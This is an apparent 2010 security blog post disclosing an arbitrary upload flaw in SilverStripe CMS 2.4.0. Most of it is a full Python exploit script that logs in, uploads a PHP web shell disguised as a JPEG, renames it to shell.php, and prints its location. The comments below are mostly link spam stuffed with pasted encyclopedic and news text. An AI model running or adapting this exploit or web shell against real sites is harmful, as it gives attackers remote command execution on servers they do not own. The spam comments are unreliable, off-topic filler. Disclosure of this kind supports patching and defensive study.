This site is soon to be deprecated by http://www.johnleitch.net

Monday, June 7, 2010

SilverStripe CMS 2.4.0 Arbitrary Upload

An arbitrary upload vulnerability in SilverStripe CMS 2.4.0 can be exploited to upload a PHP shell. A user account with File & Images permission is necessary to exploit this vulnerability.

PoC
Silverstripe-Shell.py
import sys, socket, re
host = '192.168.1.4'
path = '/silverstripe'
username = 'admin'
password = 'Password1'
port = 80

def send_request(request):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send(request)

resp = ''

while 1:
r = s.recv(8192)
if not r: break
resp += r
if r[:15] == 'HTTP/1.1 302 OK': break

s.close()

return resp

def upload_shell():
print 'authenticating'

content = 'AuthenticationMethod=MemberAuthenticator&Email=' + username + '&Password='+ password + '&action_dologin=Log+in'

header = 'POST http://' + host + path + '/Security/LoginForm HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Connection: keep-alive\r\n'\
'User-Agent: x\r\n'\
'Content-Length: ' + str(len(content)) + '\r\n'\
'Cache-Control: max-age=0\r\n'\
'Origin: http://' + host + '\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
'Accept-Encoding: gzip,deflate,sdch\r\n'\
'Accept-Language: en-US,en;q=0.8\r\n'\
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
'\r\n'

resp = send_request(header + content)

print 'uploading shell'

match = re.findall(u'Set-Cookie:\s([^\r\n]+)', resp)

for m in match:
if m[:9] == 'PHPSESSID':
cookie = m

content = '------x\r\n'\
'Content-Disposition: form-data; name="ID"\r\n'\
'\r\n'\
'0\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="FolderID"\r\n'\
'\r\n'\
'0\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="action_doUpload"\r\n'\
'\r\n'\
'1\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="Files[1]"; filename=""\r\n'\
'\r\n'\
'\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="Files[0]"; filename="shell.jpg"\r\n'\
'Content-Type: image/jpeg\r\n'\
'\r\n'\
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n'\
'\r\n'\
'\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="action_upload"\r\n'\
'\r\n'\
'Upload Files Listed Below\r\n'\
'------x--\r\n'\

header = 'POST http://' + host + path + '/admin/assets/UploadForm HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Proxy-Connection: keep-alive\r\n'\
'User-Agent: x\r\n'\
'Content-Length: ' + str(len(content)) + '\r\n'\
'Cache-Control: max-age=0\r\n'\
'Origin: http://' + host + '\r\n'\
'Content-Type: multipart/form-data; boundary=----x\r\n'\
'Accept: text/html\r\n'\
'Accept-Encoding: gzip,deflate,sdch\r\n'\
'Accept-Language: en-US,en;q=0.8\r\n'\
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
'Cookie: ' + cookie + '\r\n'\
'\r\n'

resp = send_request(header + content)

print 'grabbing ids'

file_id = re.search(u'/\*\sIDs:\s(\d+)\s\*/', resp).group(1)
file_name = re.search(u'/\*\sNames:\s([^\*]+)\s\*/', resp).group(1)

resp = send_request('GET http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1 HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Cookie: ' + cookie + '\r\n\r\n')

print 'renaming shell'

security_id = re.search(u'name="SecurityID" value="(\d+)"', resp).group(1)
owner_id = re.search(u'option selected="selected" value="(\d+)"', resp).group(1)

content = 'Title=' + file_name + '&Name=shell.php&FileType=JPEG+image+-+good+for+photos&Size=56+bytes&OwnerID=' + owner_id + '&Dimensions=x&ctf%5BchildID%5D=' + file_id + '&ctf%5BClassName%5D=File&SecurityID=' + security_id + '&action_saveComplexTableField=Save'

header = 'POST http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/DetailForm HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Proxy-Connection: keep-alive\r\n'\
'User-Agent: x\r\n'\
'Referer: http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1\r\n'\
'Content-Length: ' + str(len(content)) + '\r\n'\
'Cache-Control: max-age=0\r\n'\
'Origin: http://' + host + '\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
'Accept-Encoding: gzip,deflate,sdch\r\n'\
'Accept-Language: en-US,en;q=0.8\r\n'\
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
'Cookie: ' + cookie + '; PastMember=1\r\n'\
'\r\n'

resp = send_request(header + content)

print 'shell located at http://' + host + path + '/assets/shell.php'

upload_shell()

30 comments:

  1. Thanks for noting this, the vulnerability has been fixed a while ago in http://open.silverstripe.org/ticket/5693

    ReplyDelete
  2. I wanted to thank you for this great read!! I definitely enjoying every little bit of it I have you bookmarked to check out new stuff you post

    WIFI network installations Cheap Car Rentals

    ReplyDelete
  3. Hip Hop Bling now carries iced out G Shocks which has never been seen before. These are your good ol� Authentic Casio G Shocks, but super decked out. We make these interchangeable face plates in real diamond or simulated diamonds depending on your budget.

    custom g shock watches
    Pink Lubricant

    ReplyDelete
  4. Distilled Water is made by heating water and collecting the steam, leaving sediment and contaminates behind. Our water distiller uses full size stainless steel heating coils and a stainless steel boiling chamber, and the evaporated steam is collected in a glass carafe that can be used to store your water. This distiller makes 1 gallon of water every 5 hours.

    water distiller
    60x salvia

    ReplyDelete
  5. Uhm. You say true. I think so. Wish you good luck.good night.
    Box Doccia
    poncho

    ReplyDelete
  6. This comment has been removed by the author.

    ReplyDelete
  7. A frequently heard, and reasonable, etymology of Sài Gòn is that Sài is a Chinese loanword (Chinese: 柴, pronounced chái in Mandarin) meaning “firewood, lops, twigs; palisade”, while Gòn is another Chinese loanword (Chinese: 棍, pronounced gùn in Mandarin) meaning “stick, pole, bole”, and whose meaning evolved into “cotton” in Vietnamese (bông gòn, literally “cotton stick”, i.e., “cotton plant”, then shortened to gòn). This name may refer to the many kapok plants that the Khmer people had planted around Prey Nokor, and which can still be seen at Cây Mai temple and surrounding areas.[10] It may also refer to the dense and tall forest that once existed around the city, a forest to which the Khmer name, Prey Nokor, already referred.
    pet shops
    Cartier Ballon Bleu replica

    ReplyDelete
  8. Hip Hop Bling now carries iced out G Shocks which has never been seen before. These are your good ol� Authentic Casio G Shocks, but super decked out. We make these interchangeable face plates in real diamond or simulated diamonds depending on your budget.

    motherboard driver download
    online business

    ReplyDelete
  9. The green loading bar in Home Edition and the yellow one in Embedded were replaced with the blue bar, seen in Professional and other versions of Windows XP, making the boot-screen of operating systems resemble each other. Colors in other areas, such as Control Panel and the Help and Support tool, remained as before.
    Service Pack 2 also added new security enhancements (codenamed "Springboard"),[48] which included a major revision to the included firewall that was renamed to Windows Firewall and became enabled by default, Data Execution Prevention, which can be weakly emulated,[clarification needed] gains hardware support in the NX bit that can stop some forms of buffer overflow attacks.
    samsung galaxy tab review
    payday advance loans

    ReplyDelete
  10. Peru was defeated by Chile in the 1879–1883 War of the Pacific, losing the provinces of Arica and Tarapacá in the treaties of Ancón and Lima. Internal struggles after the war were followed by a period of stability under the Civilista Party, which lasted until the onset of the authoritarian regime of Augusto B. Leguía.[24] The Great Depression caused the downfall of Leguía, renewed political turmoil, and the emergence of the American Popular Revolutionary Alliance (APRA).[25] The rivalry between this organization and a coalition of the elite and the military defined Peruvian politics for the following three decades.
    organic acai
    Sugar Daddy Baby Website

    ReplyDelete
  11. The Nara period (710–784) of the 8th century marked the emergence of a strong Japanese state, centered on an imperial court in Heijō-kyō (modern Nara). The Nara period is characterized by the appearance of a nascent literature as well as the development of Buddhist-inspired art and architecture.[29] The smallpox epidemic of 735–737 is believed to have killed as much as one-third of Japan's population.[30] In 784, Emperor Kammu moved the capital from Nara to Nagaoka-kyō before relocating it to Heian-kyō (modern Kyoto) in 794.


    Byōdō-in (1053) is a temple of Pure Land Buddhism. It was registered to the UNESCO World Heritage Site.
    This marked the beginning of the Heian period (794–1185), during which a distinctly indigenous Japanese culture emerged, noted for its art, poetry and prose. Lady Murasaki's The Tale of Genji and the lyrics of Japan's national anthem Kimigayo were written during this time.
    japanese matchmaker
    Interior Designers Miami

    ReplyDelete
  12. Japan has a total of 6,852 islands extending along the Pacific coast of Asia. The country, including all of the islands it controls, lies between latitudes 24° and 46°N, and longitudes 122° and 146°E. The main islands, from north to south, are Hokkaidō, Honshū, Shikoku and Kyūshū. The Ryūkyū Islands, including Okinawa, are a chain to the south of Kyūshū. Together they are often known as the Japanese Archipelago.[74] About 73 percent of Japan is forested, mountainous, and unsuitable for agricultural, industrial, or residential use.
    Be a Sugar Daddy Baby
    hampers

    ReplyDelete
  13. Subsequently the Germans were dealt major defeats first at the Battle of Stalingrad in the winter of 1942–43,[64] and then in the Battle of Kursk in the summer of 1943. Another German failure was the Siege of Leningrad, in which the city was fully blockaded on land between 1941–44 by German and Finnish forces, suffering starvation and more than a million deaths, but never surrendering.[65] Under Stalin's administration and the leadership of such commanders as Georgy Zhukov and Konstantin Rokossovsky, Soviet forces drove through Eastern Europe in 1944–45 and captured Berlin in May 1945. In August 1945 the Soviet Army ousted Japanese from China's Manchukuo and North Korea, contributing to the allied victory over Japan.
    vegetables for dogs
    scavenger hunt clues

    ReplyDelete
  14. It is estimated to be about 9–22 times the mass of the Earth[25] and about 25,000 km across.[26] This is surrounded by a thicker liquid metallic hydrogen layer, followed by a liquid layer of helium-saturated molecular hydrogen that gradually transitions into gas with increasing altitude. The outermost layer spans 1000 km and consists of an entirely gaseous atmosphere.
    Patterns stained glass
    LOS ANGELES FUNERAL LIMOUSINE

    ReplyDelete
  15. With its remarkable number of reputable universities and colleges that offer a complete range of great courses and programs, overseas students are secured that they will receive the best education they need for their career enhancement and development.

    fulvic ionic minerals
    stone veneer

    ReplyDelete
  16. Sake is produced by the multiple parallel fermentation of rice. The rice is first polished to remove the protein and oils from the exterior of the rice grains, leaving behind starch. Thorough milling leads to fewer congeners and generally a more desirable product.
    Newly polished rice is allowed to "rest" until it has absorbed enough moisture from the air so that it will not crack when immersed in water. After this resting period, the rice is washed clean of the rice powder produced during milling and then steeped in water. The length of time depends on the degree to which the rice was polished, ranging from several hours or even overnight for an ordinary milling to just minutes for highly polished rice.
    After soaking, the rice is steamed on a conveyor belt. The degree of cooking must be carefully controlled; overcooked rice will ferment too quickly for flavors to develop well and undercooked rice will only ferment on the outside. The steamed rice is then cooled and divided into portions for different uses.
    rainwater harvestingSales Recruitment

    ReplyDelete
  17. gold coast recording studioCheap VPNRaine than former Tarantino hombres like Bruce Willis or Michael Madsen. Roth is solid as the “Bear Jew.” The Basterds are in truth defined by their comparative absence from the world of cinema in relation to the film's other characters. As Raine tells a doomed German, watching Donny Donowitz split open German heads with his baseball bat “ is the closest we get to goin' to the movies.” Tarantino's sly comment about the possible, cathartic need for filmic violence as a substitute to real-world bloodletting cannot go unnoticed. Beyond this, in a typically Tarantino-esque, twisted manner, the Basterds may

    ReplyDelete
  18. I thsboank you to service making grouping more alive of practical issueExcellent whatsis as exemplary.

    sbobet
    sbo

    ReplyDelete
  19. red wine brands

    psicologos boadilla\
    The Tuaregs consider the area, which they call Azawad, as the cradle of their nomadic civilization and launched an insurgency in January to achieve a separate homeland. The conflict has uprooted more than 200,000 people from their homes.
    Events leading to military coup in Mali Erin Burnett's message for Mali
    Buoyed by the chaos after last month's military coup that toppled the government, the rebels swept through the north with relative ease and wrested control of several strategic cities, including Kidal, Gao and Timbuktu.

    ReplyDelete
  20. como ganhar dinheiro extra

    air conditioning Denver
    The town is emptying out," a Timbuktu resident told Amnesty. "People are going to the south or to Mauritania. They are using all means: by car, by motorbike or on the donkeys."
    Meanwhile in the capital, Bamako, military leaders who overthrew President Amadou Toumani Toure because of his alleged inability to handle the Tuareg rebellion postponed plans Thursday for a national convention aimed at addressing political woes. The reason remained unclear.

    ReplyDelete
  21. >replicas de relogios famosos

    psicologos el escorial
    It calls for the government to ensure "timely provision of humanitarian assistance" and to intensify "the pace and scale of release of arbitrarily detained persons." It also calls for freedom of movement for journalists and the right to demonstrate.
    Syria has noted it would implement the plan and said Thursday it had taken steps to comply. Its ambassador to the United Nations, Bashar Jaafari, acknowledged that the fighting was still going on -- but he blamed that on opposition groups he said were being armed by Saudi Arabia, Turkey and Qatar, which currently holds the General Assembly presidency.

    ReplyDelete
  22. replicas de relogios Mont Blanc

    psicologos las rozas
    What Assad fails to understand is that the wheel cannot be taken backwards. All these oppresed masses in Syria have taken down a wall - "the wall of silence", they are no longer afraid to speak their mind. They are no longer afraid of Assads secret police, and they will remain a feature of Syria in the years to come.

    ReplyDelete
  23. Finally, an issue that I am passionate about. I have looked for information of this caliber for the last several hours. Your site is greatly appreciated. http://wine-bags.net/

    ReplyDelete